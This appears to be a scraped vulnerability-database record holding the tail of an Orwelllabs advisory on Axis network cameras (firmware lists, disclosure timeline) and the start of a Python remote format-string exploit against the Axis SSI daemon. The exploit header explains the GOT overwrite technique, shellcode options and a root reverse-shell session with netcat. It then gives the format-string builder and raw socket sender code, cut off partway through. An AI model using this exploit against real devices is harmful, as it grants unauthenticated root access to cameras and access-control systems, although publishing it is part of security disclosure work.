5.85.1.1 e666578d7fca54a7db0917839187cd1a \nAXIS A8004-VE 5.85.1 50f114d1169f6fe8dbdadd89ad2e087d \nAXIS F34 5.85.3 7a6ed55038edd8a2fc0f676fb8a04b10 \nAXIS F41 5.85.3 8a089a51a0ecd63543c7883c76db7921 \nAXIS F44 5.85.3 9e3b05625cfe6580ca3e41c5415090e7 \nAXIS M1013 5.50.5.4 231cdd7ba84a383ba7f2237612b1cc12 \nAXIS M1014 5.50.5.4 231cdd7ba84a383ba7f2237612b1cc12 \nAXIS M1025 5.50.5.4 90d59c56171402828fceb7d25b18be2e \nAXIS M1033-W 5.50.5.4 7b96dd594f84fc8c3a4a3ab650434841 \nAXIS M1034-W 5.50.5.4 7b96dd594f84fc8c3a4a3ab650434841 \nAXIS M1054 5.50.3.4 39e279aa2c462e9ec01c7b90f698f76a \nAXIS M1103 5.50.3 c10243b05fe30655ded7a12b998dbf5e \nAXIS M1104 5.50.3 c10243b05fe30655ded7a12b998dbf5e \nAXIS M1113 5.50.3 c10243b05fe30655ded7a12b998dbf5e \nAXIS M1114 5.50.3 c10243b05fe30655ded7a12b998dbf5e \nAXIS M1124 5.75.3.3 f53e0ada9f2e54d2717bf8ad1c7a5928 \nAXIS M1125 5.75.3.3 f53e0ada9f2e54d2717bf8ad1c7a5928 \nAXIS M1143-L 5.60.1.5 367aab0673fc1dec0b972fd80a62e75b \nAXIS M1144-L 5.60.1.5 367aab0673fc1dec0b972fd80a62e75b \nAXIS M1145 5.90.1 ece8f4ccd9d24a01d382798cb7e4a7c7 \nAXIS M1145-L 5.90.1 ece8f4ccd9d24a01d382798cb7e4a7c7 \nAXIS M2014 5.50.6 3ffe1a771565b61567f917621c737866 \nAXIS M3004 5.50.5.4 d65545ef6c03b33b20bf1a04e8216a65 \nAXIS M3005 5.50.5.4 b461fb6e6aab990d3650b48708cee811 \nAXIS M3006 5.70.1.2 b2864dcf48ac83053ba4516a2bda535e \nAXIS M3007 5.75.1.1 a0cc2e9a6ddad758b16f7de518080f70 \nAXIS M3014 5.40.9.5 01d8917c9e60dde7741c4a317044b2f7 \nAXIS M3024-LVE 5.50.5.4 0b91bb66d37e208e130c7eb25099817b \nAXIS M3025-VE 5.50.5.4 751f776668d340edf4149dc116ce26c6 \nAXIS M3026 5.70.1.2 3e78ce4badf994f6d10c5916b6d5513d \nAXIS M3027 5.75.1.1 6d377ea9ea99068e910b416ccc73d8ca \nAXIS M3037 5.75.1.1 ef69c662079018e19e988663ad1fc509 \nAXIS M3113-R 5.40.9.4 8d3eac43ad5c23626b75d5d7c928e29d \nAXIS M3113-VE 5.40.9.4 8d3eac43ad5c23626b75d5d7c928e29d \nAXIS M3114-R 5.40.9.4 8d3eac43ad5c23626b75d5d7c928e29d \nAXIS M3114-VE 5.40.9.4 8d3eac43ad5c23626b75d5d7c928e29d \nAXIS M3203 5.50.3.1 7da467702db8b0e57ea5d237bd10ab61 \nAXIS M3204 5.50.3.1 7da467702db8b0e57ea5d237bd10ab61 \nAXIS M5013 5.50.3.1 9183b9ac91c3c03522f37fce1e6c2205 \nAXIS M5014 5.50.3.1 9183b9ac91c3c03522f37fce1e6c2205 \nAXIS M7010 5.50.4.1 84f618087151b0cc46398a6e0c6ebc0d \nAXIS M7011 5.90.1 362658a55d4f2043ed435c72588bd7e7 \nAXIS M7014 5.50.4.1 84f618087151b0cc46398a6e0c6ebc0d \nAXIS M7016 5.51.2.3 b3de957bbca166f145969a6884050979 \nAXIS P1204 5.50.6 3ffe1a771565b61567f917621c737866 \nAXIS P1214 5.50.6 3ffe1a771565b61567f917621c737866 \nAXIS P1224 5.50.6 3ffe1a771565b61567f917621c737866 \nAXIS P1343 5.40.9.8 9bbd08a92881b1b07e9f497a436b6a60 \nAXIS P1344 5.40.9.8 9bbd08a92881b1b07e9f497a436b6a60 \nAXIS P1346 5.40.9.6 c89ee1e7c54b4728612277e18be1c939 \nAXIS P1347 5.40.9.6 f0f95768e367c3a2a8999a0bd8902969 \nAXIS P1353 5.60.1.5 0f59d0e34301519908754af850fdfebb \nAXIS P1354 5.90.1 120c230067b7e000fa31af674f207f03 \nAXIS P1355 5.60.1.5 5dbec1d7b8b6f337581da6ec668a9aad \nAXIS P1357 5.90.1 d83472c4d545763e5b05cd6d0c63430f \nAXIS P1364 5.85.4 2db00322be0b8c939c89fe4f3e0fd67d \nAXIS P1365 5.75.3.2 1eba3426b2046e696d80ea253fe5e9b6 \nAXIS P1405 5.80.1.1 4db97061feb3cf91eb0cded516f9c5af \nAXIS P1425 5.80.1.1 e9213ed81dc68f07c854a990889995ba \nAXIS P1427 5.80.1.1 dfe4cd28b929e78d42e8fc8c98616a7c \nAXIS P1428-E 5.80.1.1 7a65a0b0e4050824de0d46a1725ad0ea \nAXIS P1435 5.85.4.1 219467e77dcb3195d7203a79ecd30474 \nAXIS P3214 6.10.1 00fca61c0a97dfc5e670a308cbda14d4 \nAXIS P3215 6.10.1 00fca61c0a97dfc5e670a308cbda14d4 \nAXIS P3224 6.10.1.1 5fae8852b7790cf6f66bb2356c60acd6 \nAXIS P3225 6.10.1.1 5fae8852b7790cf6f66bb2356c60acd6 \nAXIS P3301 5.40.9.4 27b7a421f7e3511f3a4b960c80b42c56 \nAXIS P3304 5.40.9.4 df9e2159c4eadf5e955863c7c5691b1a \nAXIS P3343 5.40.9.8 dd752099f8b2c48b91914ec32484f532 \nAXIS P3344 5.40.9.8 dd752099f8b2c48b91914ec32484f532 \nAXIS P3346 5.50.3.1 d30498356187ba44f94f31398b04a476 \nAXIS P3353 5.60.1.4 fa4924480563924a0365268f8eef8864 \nAXIS P3354 6.10.1 d2f317d88dea1f001ce8151106e0322b \nAXIS P3363 5.60.1.5 4b3175a30893a270e5dca8fc405b5d7e \nAXIS P3364 6.10.1 6128c6ba026a68a5759b08971504807e \nAXIS P3365 6.10.1 f26b0616c595622abb17ce4411dee2b2 \nAXIS P3367 6.10.1 8dad67aae2ffaee6fb147d6942476f00 \nAXIS P3384 6.10.1 138ff1bdc97d025f8f31a55e408e2a1d \nAXIS P3904-R 5.80.1 0b420fa6e8b768cafd6fa6b5920883be \nAXIS P3905-R 5.80.1 0b420fa6e8b768cafd6fa6b5920883be \nAXIS P3915-R 5.80.1 1dcf4a39c7e7349629ade723f563e892 \nAXIS P5414-E 5.90.1 f5782c5dbe8dcffd7863b248a55682ee \nAXIS P5415-E 5.90.1 f5782c5dbe8dcffd7863b248a55682ee \nAXIS P5512 95.50.4.2 a2d5aab90d51af80d924bb3cc8b249fc \nAXIS P5512-E 5.50.4.2 4fd5d721e27fe0f4db7d652bd1730749 \nAXIS P5514-E 5.85.3 b1fc3d26f6293b94f042ac6ea3aa8271 \nAXIS P5515 5.85.3 99b2512b57ed8a12c6ad2e53adc8acf8 \nAXIS P5515-E 5.85.3 639388e504a0841cad2eee7374476727 \nAXIS P5522 5.50.4.3 8335552031bc297ce87666542f0e3106 \nAXIS P5522-E 5.50.4.2 218e1b6997f0e5338f86f0ed1b12f8a0 \nAXIS P5532 5.41.3.1 b1ab3dd8ed126dd68b4793dec9bf3698 \nAXIS P5532-E 5.41.3.1 f6322413687d169dce61459d8338a611 \nAXIS P5534 5.40.9.5 3b94922050bec9bc436dce3fcd9bcfaf \nAXIS P5534-E 5.40.9.6 a931bc58ee0e882b359dbecd3d699c52 \nAXIS P5544 5.41.2.2 cb5bcec36f839914db93eaf17ae83e5e \nAXIS P5624-E 5.75.1.1 b93952a6083aa628026f145a1dffa313 \nAXIS P5635-E 5.75.1.1 24d32e4fab54f16b5698ff4e477fc188 \nAXIS P7210 5.50.4.1 b0e19f8837754ac73aa146b5710a12b1 \nAXIS P7214 5.50.4.1 b0e19f8837754ac73aa146b5710a12b1 \nAXIS P7216 5.51.2.1 a77e96832f7d87970bf286288ce2ca81 \nAXIS P7224 5.51.2.1 5d5ecf065f456e66eb42d9360d22f863 \nAXIS P8514 5.40.9.4 8d3eac43ad5c23626b75d5d7c928e29d \nAXIS Q1615 5.80.1.3 8d95c0f9f499f29fcfb95419b629ab44 \nAXIS Q1635 5.80.1.3 8d95c0f9f499f29fcfb95419b629ab44 \nAXIS Q1635-E 5.80.1.3 8d95c0f9f499f29fcfb95419b629ab44 \nAXIS Q1755 5.50.4.1 6ca8597f48ed122ce84c2172c079cdf9 \nAXIS Q1765-LE 5.90.1.1 7930bf5c4c947f2f948f8b7475f01409 \nAXIS Q1765-LE-PT 5.90.1.1 890ba75a8108d97f2ef1a4aecedf76b1 \nAXIS Q1775 5.85.3 f47bc9d46a913561e42b999cc6697a83 \nAXIS Q1910 5.50.4.1 71525d4d56d781318b64e8200806dcf0 \nAXIS Q1921 5.50.4.1 82f956fec96a9068941e24e12045cefd \nAXIS Q1922 5.50.4.1 111a1a4f823e7281af1c872ba52f73c4 \nAXIS Q1931-E 5.75.1.3 5cf13a2c3d65644c3376ec6466dd9b49 \nAXIS Q1931-E-PT-Mount5.75.1.1 3ba7e187dc25e98ab73aef262b68e1b9 \nAXIS Q1932-E 5.75.1.2 b8efe54fc3eca7f2a59322779e63e8e1 \nAXIS Q1932-E PT.Mount5.75.1 513fc031f85542548eeccfeaa7c1a29e \nAXIS Q2901-E 5.55.4.1 d2945717297edab3326179541cfa0688 \nAXIS Q2901-E PT.Mount5.55.4.1 a41aed45359f11d2ec248419c124a52d \nAXIS Q3505 5.80.1.4 9394b3577bdb17cb9f74e56433a0e660 \nAXIS Q3709-PVE 5.75.1.1 e9fb87337c0a24139a40459336f0bcb3 \nAXIS Q6000-E 5.65.1.1 b97df19057db1134a43c26f5ddf484de \nAXIS Q6032 5.41.1.2 8caad5cd7beeebaf5b05b011b8a1e104 \nAXIS Q6032-C 5.41.3 58213a4b1c7a980dcb3b54bbee657506 \nAXIS Q6032-E 5.41.1.4 b4aa977b254694b5d14d7e87e5652a6b \nAXIS Q6034 5.41.1.1 4f44a8661534bac08a50651ee90a7d47 \nAXIS Q6034-C 5.41.3 25d455dc2e2d11639f29b0b381ddd7cb \nAXIS Q6034-E 5.41.1.2 3bfab61354170e42ce27fc2477d57026 \nAXIS Q6035 5.41.1.2 9d124d096bf48fbfd2e11c34de3c880d \nAXIS Q6035-C 5.41.3 42d23ae4d0b1456cc54e54734a586d53 \nAXIS Q6035-E 5.41.1.5 e2123a9e37fda4044847c810b7f25253 \nAXIS Q6042 5.70.1.1 4f253ed4bb0efaa4a845e0e9bd666766 \nAXIS Q6042-C 5.70.1.1 21bd154f706091b348c33dd9564438da \nAXIS Q6042-E 5.70.1.2 9d5dc03268638498d0299bf466fa0501 \nAXIS Q6042-S 5.70.1.1 085fc5903d99899d78b48abb9cafdecd \nAXIS Q6044 5.70.1.1 29e4cdb9ba2f18953512c5d1e17229c1 \nAXIS Q6044-C 5.70.1.1 dc3fc472b88e07278e6ff82eaee71a8d \nAXIS Q6044-E 5.70.1.2 83d1e6c1fe5aa9c26710eed03721f928 \nAXIS Q6044-S 5.70.1.1 654ffd048fdb41ae3c86da4f41e2a31d \nAXIS Q6045 5.70.1.1 2db9b247729e9487f476a35a6dd456ce \nAXIS Q6045-C 5.70.1.1 9bb561126e2b4f69ac526cfccdf254f6 \nAXIS Q6045-C-MkII 5.70.1.1 2c9efccb0fba0e63fc4fff73e6ba0fea \nAXIS Q6045-E 5.70.1.2 321a5d906863787fdc5e34483e6ec2a8 \nAXIS Q6045-E-MkII 5.70.1.2 d9d4242a83b1ed225dd3c20530da034d \nAXIS Q6045-MkII 5.70.1.1 686f0fe8727e2a726091c9ddf3827741 \nAXIS Q6045-S 5.70.1.1 43473e42f360efb4ea6f84da35fd9746 \nAXIS Q6045-S-Mk-II 5.70.1.1 d747a5a3d69264af8448f72822e8d60b \nAXIS Q6114-E 5.65.2.1 8cb9a3a88c79ebb2cf5def3cda0da148 \nAXIS Q6115-E 5.65.2.1 7d2dd3410ce505cd04a1c182917523a5 \nAXIS Q6128-E 5.85.2.1 49508ff56508f809a75d367896e8d56f \nAXIS Q7401 5.50.4 99855c6c9777fdd5fc5e58349ae861a5 \nAXIS Q7404 5.50.4.2 ffdbee7c9daad303e89a432ba9c4711d \nAXIS Q7404 5.50.4 6e31e9709cf9717968c244267aa8c6d0 \nAXIS Q7406 5.51.2 3cdb7935278157b9c91c334613012b1e \nAXIS Q7411 5.90.1 26893adedcfc1953829084e8e7c3fbdd \nAXIS Q7414 5.51.2 8ff659a8db077b545205f56dfef217d4 \nAXIS Q7424-R 5.50.4 d570ef1886c84ab53934fc51385e8aa7 \nAXIS Q7424-R-MkII 5.51.3 964a13f6b1aef17562cbbde11d936dee \nAXIS Q7436 5.90.1 8fe1ef95b231bf6f771c3edc0fbc8afd \nAXIS Q8414-LVS 6.10.1 9529cd9cf3b3bd66bec22c0b1c7448cd \nAXIS Q8631-E 5.75.1 c7f882afc268ca3d60d07d5770db6a51 \nAXIS Q8632-E 5.75.1 f01d9a86d21335fe3d78e634858b9e77 \nAXIS Q8665-LE 5.90.1.1 1549b56d34250a93bbcf7b24b4f63699 \nAXIS V5915 5.75.1.1 a1c39a9cd545091825001a831d0c1ea4 \n \n \nVendor Information, Solutions and Workarounds \n+++++++++++++++++++++++++++++++++++++++++++++ \nAccording to the Vendor, tickets was opened to correct this issue. \n \nCredits \n+++++++ \nThese vulnerabilities has been discovered and published by Orwelllabs. \n \n \nTimeline \n++++++++ \n2015-09-10: First attempt to contact Vendor \n2015-10-30: Vulnerability was reported to CERT \n2015-11-30: CVE-IDs are assigned \n2016-07-25: Since the first vulnerability was published (09.04.2016 - \nEDB-ID: 39683) \na long conversation revolved around these vulnerabilities with the \nmanufacturer. \nWe maintained communication since 15/04/2016 until now. \nAs there is still disagreement regarding vulnerabilities (and botnets in \nthe wild: https://goo.gl/k79I8u), \nwe thought it good to publish this advisory, since it has already exhausted \nall deadlines. \n \n \nLegal Notices \n+++++++++++++ \nThe information contained within this advisory is supplied \"as-is\" with no \nwarranties or guarantees of fitness of use or otherwise. We accept no \nresponsibility for any damage caused by the use or misuse of this \ninformation. \n \n \nAbout Orwelllabs \n++++++++++++++++ \n# Loadind k4fK43sQu3 m0dule... \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/138083/OWLL2015-8257.txt"}, {"lastseen": "2016-11-03T10:24:14", "description": "", "published": "2016-07-18T00:00:00", "type": "packetstorm", "title": "Axis Communications MPQT/PACS SSI Remote Format String / Code Execution", "bulletinFamily": "exploit", "cvelist": [], "modified": "2016-07-18T00:00:00", "id": "PACKETSTORM:137941", "href": "https://packetstormsecurity.com/files/137941/Axis-Communications-MPQT-PACS-SSI-Remote-Format-String-Code-Execution.html", "sourceData": "` \n#!/usr/bin/env python2.7 \n# \n# [SOF] \n# \n# [Remote Format String Exploit] Axis Communications MPQT/PACS Server Side Include (SSI) Daemon \n# Research and development by bashis <mcw noemail eu> 2016 \n# \n# This format string vulnerability has following characteristic: \n# - Heap Based (Exploiting string located on the heap) \n# - Blind Attack (No output the remote attacker)(*) \n# - Remotly exploitable (As anonymous, no credentials needed) \n# \n# (*) Not so 'Blind' after all, since the needed addresses can be predicted by statistic. \n# \n# This exploit has following characteristic: \n# - Multiple architecture exploit (MIPS/CRISv32/ARM) [From version 5.20.x] \n# - Modifying LHOST/LPORT in shellcode on the fly \n# - Manual exploiting of remote targets \n# - Simple HTTPS support \n# - Basic Authorization support (not needed for this exploit) \n# - FMS dictionary and predicted addresses for GOT free() / BSS / Netcat shellcode \n# - Multiple shellcodes (ARM, CRISv32, MIPS and Netcat PIPE shell) \n# - Exploiting with MIPS, CRISv32 and ARM shellcode will give shell as root \n# - Exploiting with ARM Netcat PIPE shell give normally shell as Anonymous (5.2x and 5.4x give shell as root) \n# - Multiple FMS exploit techniques \n# - \"One-Write-Where-And-What\" for MIPS and CRISv32 \n# Using \"Old Style\" POP's \n# Classic exploit using: Count to free() GOT, write shellcode address, jump to shellcode on free() call \n# Shellcode loaded in memory by sending shellcode URL encoded, that SSI daemon decodes and keeps in memory. \n# - \"Two-Write-Where-And-What\" for ARM \n# 1) \"Old Style\": Writing 1x LSB and 1x MSB by using offsets for GOT free() target address \n# 2) \"New Style\": ARM Arch's have both \"Old Style\" (>5.50.x) )POPs and \"New Style\" (<5.40.x) direct parameter access for POP/Write \n# [Big differnce in possibilities between \"Old Style\" and \"New Style\", pretty interesting actually] \n# - Another way to POP with \"Old Style\", to be able POPing with low as 1 byte (One byte with %1c instead of eight with %8x) \n# - Exploit is quite well documented \n# \n# Anyhow, \n# Everything started from this simple remote request: \n# \n# --- \n# $ echo -en \"GET /httpDisabled.shtml?&http_user=%p|%p HTTP/1.0\\n\\n\" | netcat 192.168.0.90 80 \n# HTTP/1.1 500 Server Error \n# Content-Type: text/html; charset=ISO-8859-1 \n# \n# <HTML><HEAD><TITLE>500 Server Error</TITLE></HEAD> \n# <BODY><H1>500 Server Error</H1> \n# The server encountered an internal error and could not complete your request. \n# </BODY></HTML> \n# --- \n# \n# Which gave this output in /var/log/messages on the remote device: \n# \n# --- \n# <CRITICAL> Jan 1 16:05:06 axis /bin/ssid[3110]: ssid.c:635: getpwnam() failed for user: 0x961f0|0x3ac04b10 \n# <CRITICAL> Jan 1 16:05:06 axis /bin/ssid[3110]: ssid.c:303: Failed to get authorization data. \n# --- \n# \n# Which resulted into an remote exploit for more than 200 unique Axis Communication MPQT/PACS products \n# \n# --- \n# $ netcat -vvlp 31337 \n# listening on [any] 31337 ... \n# 192.168.0.90: inverse host lookup failed: Unknown host \n# connect to [192.168.0.1] from (UNKNOWN) [192.168.0.90] 55738 \n# id \n# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),6(disk),10(wheel),51(viewer),52(operator),53(admin),54(system),55(ptz) \n# pwd \n# /usr/html \n# --- \n# \n# Some technical notes: \n# \n# 1. Direct addressing with %<argument>$%n is \"delayed\", and comes in force only after disconnect. \n# Old metod with POP's coming into force instantly \n# \n# 2. Argument \"0\" will be assigned (after using old POP metod and %n WRITE) the next address on stack after POP's) \n# - Would be interesting to investigate why. \n# \n# 3. Normal Apache badbytes: 0x00, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x20, 0x23, 0x26 \n# Goodbytes: 0x01-0x08, 0x0e-0x1f, 0x21-0x22, 0x24-0x25, 0x27-0xff \n# \n# 3.1 Normal Boa badbytes: 0x00-0x08, 0x0b-0x0c, 0x0e-0x19, 0x80-0xff \n# Goodbytes: 0x09, 0x0a, 0x0d, 0x20-0x7f \n# \n# 3.2 Apache and Boa, by using URL encoded shellcode as in this exploit: \n# Badbytes = None, Goodbytes = 0x00 - 0xff (Yay!) \n# \n# 4. Everything is randomized, except heap. \n# \n# 5. My initial attempts to use ROP's was not good, as I didn't want to create \n# one unique FMS key by testing each single firmware version, and using ROP with FMS \n# on heap seems pretty complicated as there is one jump availible, maximum two. \n# \n# 5.1 Classic GOT write for free() that will jump to shellcode, was the best technique in this case. \n# \n# 6. Encoded and Decoded shellcode located in .bss section. \n# 6.1 FMS excecuted on heap \n# \n# 7. Vulnerable MPQT/PACS architectures: CRISv32, MIPS and ARM \n# 7.1 ARM has nonexecutable stack flag bit set (>5.20.x) by default on their binaries/libs, \n# so execute shellcode on heap/stack may be impossible. \n# 7.2 ARM shellcode and exploit has been verified by setting executable stack flag bit on binaries, \n# and re-compile of the image. \n# 7.3 However, ARM is easily exploitable with netcat shell, that's using the builtin '/bin/sh -c' code to execute. \n# \n# 8. This exploit are pretty well documented, more details can be extracted by reading \n# the code and comments. \n# \n# MIPS ssid maps \n# 00400000-0040d000 r-xp 00000000 00:01 2272 /bin/ssid \n# 0041d000-0041e000 rw-p 0000d000 00:01 2272 /bin/ssid \n# 0041e000-00445000 rwxp 00000000 00:00 0 [heap] \n# \n# ARM ssid maps \n# 00008000-00014000 r-xp 00000000 00:01 2055 /bin/ssid \n# 0001c000-0001d000 rw-p 0000c000 00:01 2055 /bin/ssid \n# 0001d000-00044000 rw-p 00000000 00:00 0 [heap] \n# \n# Crisv32 ssid maps \n# 00080000-0008c000 r-xp 00000000 1f:03 115 /bin/ssid \n# 0008c000-0008e000 rw-p 0000a000 1f:03 115 /bin/ssid \n# 0008e000-000b6000 rwxp 0008e000 00:00 0 [heap] \n# \n# General notes: \n# \n# When the vul daemon process is exploited, and after popping root connect-back shell, \n# the main process are usally restarted by respawnd, after the shell have spawned and taken over the parent process, \n# when the main process are fully alive again, I can enjoy the shell, and everybody else can \n# enjoy of the camera - that should make all of us happy ;) \n# During exploiting, logs says almost nothing, only that the main process restarted. \n# Note: Not true with ARM Netcat PIPE shell (as the code will vfork() and wait until child exits) \n# \n# '&http_user=' is the vuln tag, and the FMS will be excecuted when it will try to do vsyslog(), \n# after ssid cannot verify the user, free() are the closest function to be called after \n# vsyslog(), needed and perfect to use for jumping. \n# There is nothing shown for remote user, possible output of FMS are _only_ shown in log/console. \n# So we are pretty blind, but due to fixed FMS keys, that doesn't matter for us - it's predictable by statistics. \n# \n# Quite surprised to see so many different devices and under one major release version, \n# that's covered by one \"FMS key\". The \"FMS key\" are valid for all minor versions under the major version. \n# \n# This made me start thinking how brilliant and clever it would be to make an sophisticated door that's using format string as backdoor, \n# which generates no FMS output whatsoever to attacker and unlocked by a 'FMS key', instead of using hardcoded login/password. \n# \n# - No hardcoded login/password that could easily be found in firmware/software files. \n# - Extremely hard to find without local access (and find out what to trigger for opening the door) \n# - Nobody can not actually prove it is a sophisticated door for sure. \"It's just another bug.. sorry! - here is the fixed version.\" \n# (Only to close this door, and open another door, somewhere else, in any binary - and try make it harder to find) \n# \n# Note: \n# I don't say that Axis Communication has made this hidden format string by this purpose. \n# I can only believe it was a really stupid mistake from Axis side, after I have seen one screen-dump of the CVS changelog of SSI Daemon, \n# and another screen-dump with the change made late 2009, from non-vulnerable to vulnerable, in the affected code of logerr(). \n# \n# Vulnerable and exploitable products \n# \n# A1001, A8004-VE, A9188, C3003, F34, F41, F44, M1124, M1124-E, M1125, M1125-E, M1145, M1145-L, M3006, \n# M3007, M3026, M3027, M3037, M7010, M7011, M7014, M7016, P1125, P1353, P1354, P1355, P1357, P1364, \n# P1365, P1405, P1405-E, P1405-LE, P1425-E, P1425-LE, P1427, P1427-E, P1435, P3214, P3214-V, P3215, \n# P3215-V, P3224, P3224-LVE, P3225-LV, P3353, P3354, P3363, P3364, P3364-L, P3365, P3367, P3384, \n# P3707-PE, P3904, P3904-R, P3905, P3915-R, P5414-E, P5415-E, P5514, P5514-E, P5515, P5515-E, P5624, \n# P5624-E, P5635-E, P7210, P7214, P7216, P7224, P8535, Q1602, Q1604, Q1614, Q1615, Q1635, Q1635-E, \n# Q1765-LE, Q1765-LE-PT, Q1775, Q1931-E, Q1931-E-PT, Q1932-E, Q1932-E-PT, Q1941-E, Q2901-E, Q2901-E-PT, \n# Q3504, Q3505, Q6000-E, Q6042, Q6042-C, Q6042-E, Q6042-S, Q6044, Q6044-C, Q6044-E, Q6044-S, Q6045, \n# Q6045-C, Q6045-E, Q6045-S, Q6114-E, Q6115-E, Q7411, Q7424-R, Q7436, Q8414, Q8414-LVS, Q8631-E, Q8632-E, \n# Q8665-E, Q8665-LE, V5914, V5915, M1054, M1103, M1104, M1113, M1114, M2014-E, M3014, M3113, M3114, M3203, \n# M3204, M5013, M5014, M7001, P12/M20, P1204, P1214, P1214-E, P1224-E, P1343, P1344, P1346, P1347, P2014-E, \n# P3301, P3304, P3343, P3344, P3346, P3346-E, P5512, P5512-E, P5522, P5522-E, P5532, P5532-E, P5534, P5534-E, \n# P5544, P8221, P8513, P8514, P8524, Q1755, Q1910, Q1921, Q1922, Q6032, Q6032-C, Q6032-E, Q6034, Q6034-C, \n# Q6034-E, Q6035, Q6035-C, Q6035-E, Q7401, Q7404, Q7406, Q7414, Q8721-E, Q8722-E, C, M1004-W, M1011, M1011-W, \n# M1013, M1014, M1025, M1031-W, M1033-W, M1034-W, M1143-L, M1144-L, M3004, M3005, M3011, M3024, M3024-L, \n# M3025, M3044-V, M3045-V, M3046-V, P1311, P1428-E, P7701, Q3709-PVE, Q3708-PVE, Q6128-E... and more \n# \n# http://origin-www.axis.com/ftp/pub_soft/MPQT/SR/service-releases.txt \n# \n# Firmware versions vulnerable to the SSI FMS exploit \n# \n# ('V.Vx' == The FMS key used in this exploit) \n# \n# Firmware Introduced CRISv32 MIPS ARM (no exec heap from >5.20.x) \n# 5.00.x 2008 - - no \n# 5.01.x 2008 no - no \n# 5.02.x 2008 no - - \n# 5.05.x 2009 no - - \n# 5.06.x 2009 no - - \n# 5.07.x 2009 no - no \n# 5.08.x 2010 no - - \n# 5.09.x 2010 no - - \n# 5.10.x 2009 no - - \n# 5.11.x 2010 no - - \n# 5.12.x 2010 no - - \n# 5.15.x 2010 no - - \n# 5.16.x 2010 no - - \n# 5.20.x 2010-2011 5.2x - 5.2x \n# 5.21.x 2011 5.2x - 5.2x \n# 5.22.x 2011 5.2x - - \n# 5.25.x 2011 5.2x - - \n# 5.40.x 2011 5.4x 5.4x 5.4x \n# 5.41.x 2012 5.4x - - \n# 5.50.x 2013 5.5x 5.5x 5.4x \n# 5.51.x 2013 - 5.4x - \n# 5.55.x 2013 - 5.5x 5.5x \n# 5.60.x 2014 - 5.6x 5.6x \n# 5.65.x 2014-2015 - 5.6x - \n# 5.70.x 2015 - 5.7x - \n# 5.75.x 2015 - 5.7x 5.7x \n# 5.80.x 2015 - 5.8x 5.8x \n# 5.81.x 2015 - 5.8x - \n# 5.85.x 2015 - 5.8x 5.8x \n# 5.90.x 2015 - 5.9x - \n# 5.95.x 2016 - 5.9x 5.8x \n# 6.10.x 2016 - 6.1x - \n# 6.15.x 2016 - - 6.1x \n# 6.20.x 2016 - 6.2x - \n# \n# Vendor URL's of still supported and affected products \n# \n# http://www.axis.com/global/en/products/access-control \n# http://www.axis.com/global/en/products/video-encoders \n# http://www.axis.com/global/en/products/network-cameras \n# http://www.axis.com/global/en/products/audio \n# \n# Axis Product Security \n# \n# product-security@axis.com \n# http://www.axis.com/global/en/support/product-security \n# http://origin-www.axis.com/ftp/pub_soft/MPQT/SR/service-releases.txt \n# http://www.axis.com/global/en/support/faq/FAQ116268 \n# \n# Timetable \n# \n# - Research and Development: 06/01/2016 - 01/06/2016 \n# - Sent vulnerability details to vendor: 05/06/2016 \n# - Vendor responce received: 06/06/2016 \n# - Vendor ACK of findings received: 07/06/2016 \n# - Vendor sent verification image: 13/06/2016 \n# - Confirmed that exploit do not work after vendors correction: 13/06/2016 \n# - Vendor informed about their service release(s): 29/06/2016 \n# - Sent vendor a copy of the (this) PoC exploit: 29/06/2016 \n# - Full Disclosure: 18/07/2016 \n# \n# Quote of the day: Never say \"whoops! :o\", always say \"Ah, still interesting! :>\" \n# \n# Have a nice day \n# /bashis \n# \n##################################################################################### \n \nimport sys \nimport string \nimport socket \nimport time \nimport argparse \nimport urllib, urllib2, httplib \nimport base64 \nimport ssl \nimport re \n \n \nclass do_FMS: \n \n# POP = \"%8x\" # Old style POP's with 8 bytes per POP \nPOP = \"%1c\" # Old style POP's with 1 byte per POP \nWRITElln = \"%lln\" # Write 8 bytes \nWRITEn = \"%n\" # Write 4 bytes \nWRITEhn = \"%hn\" # Write 2 bytes \nWRITEhhn = \"%hhn\" # Write 1 byte \n \ndef __init__(self,targetIP,verbose): \nself.targetIP = targetIP \nself.verbose = verbose \nself.fmscode = \"\" \n \n# Mostly used internally in this function \ndef Add(self, data): \nself.fmscode += data \n \n# 'New Style' Double word (8 bytes) \ndef AddDirectParameterLLN(self, ADDR): \nself.Add('%') \nself.Add(str(ADDR)) \nself.Add('$lln') \n \n# 'New Style' Word (4 bytes) \ndef AddDirectParameterN(self, ADDR): \nself.Add('%') \nself.Add(str(ADDR)) \nself.Add('$n') \n \n# 'New Style' Half word (2 bytes) \ndef AddDirectParameterHN(self, ADDR): \nself.Add('%') \nself.Add(str(ADDR)) \nself.Add('$hn') \n \n# 'New Style' One Byte (1 byte) \ndef AddDirectParameterHHN(self, ADDR): \nself.Add('%') \nself.Add(str(ADDR)) \nself.Add('$hhn') \n \n# Addressing \ndef AddADDR(self, ADDR): \nself.Add('%') \nself.Add(str(ADDR)) \nself.Add('u') \n \n# 'Old Style' POP \ndef AddPOP(self, size): \nif size != 0: \nself.Add(self.POP * size) \n \n# Normally only one will be sent, multiple is good to quick-check for any FMS \n# \n# 'Old Style' Double word (8 bytes) \ndef AddWRITElln(self, size): \nself.Add(self.WRITElln * size) \n \n# 'Old Style' Word (4 bytes) \ndef AddWRITEn(self, size): \nself.Add(self.WRITEn * size) \n \n# 'Old Style' Half word (2 bytes) \ndef AddWRITEhn(self, size): \nself.Add(self.WRITEhn * size) \n \n# 'Old Style' One byte (1 byte) \ndef AddWRITEhhn(self, size): \nself.Add(self.WRITEhhn * size) \n \n# Return the whole FMS string \ndef FMSbuild(self): \nreturn self.fmscode \n \nclass HTTPconnect: \n \ndef __init__(self, host, proto, verbose, creds, noexploit): \nself.host = host \nself.proto = proto \nself.verbose = verbose \nself.credentials = creds \nself.noexploit = noexploit \n \n# Netcat remote connectback shell needs to have raw HTTP connection as we using special characters as '\\t','$','`' etc.. \ndef RAW(self, uri): \n# Connect-timeout in seconds \ntimeout = 5 \nsocket.setdefaulttimeout(timeout) \n \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \ns.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) \ntmp = self.host.split(':') \nHOST = tmp[0] \nPORT = int(tmp[1]) \nif self.verbose: \nprint \"[Verbose] Sending to:\", HOST \nprint \"[Verbose] Port:\", PORT \nprint \"[Verbose] URI:\",uri \ns.connect((HOST, PORT)) \ns.send(\"GET %s HTTP/1.0\\r\\n\\r\\n\" % uri) 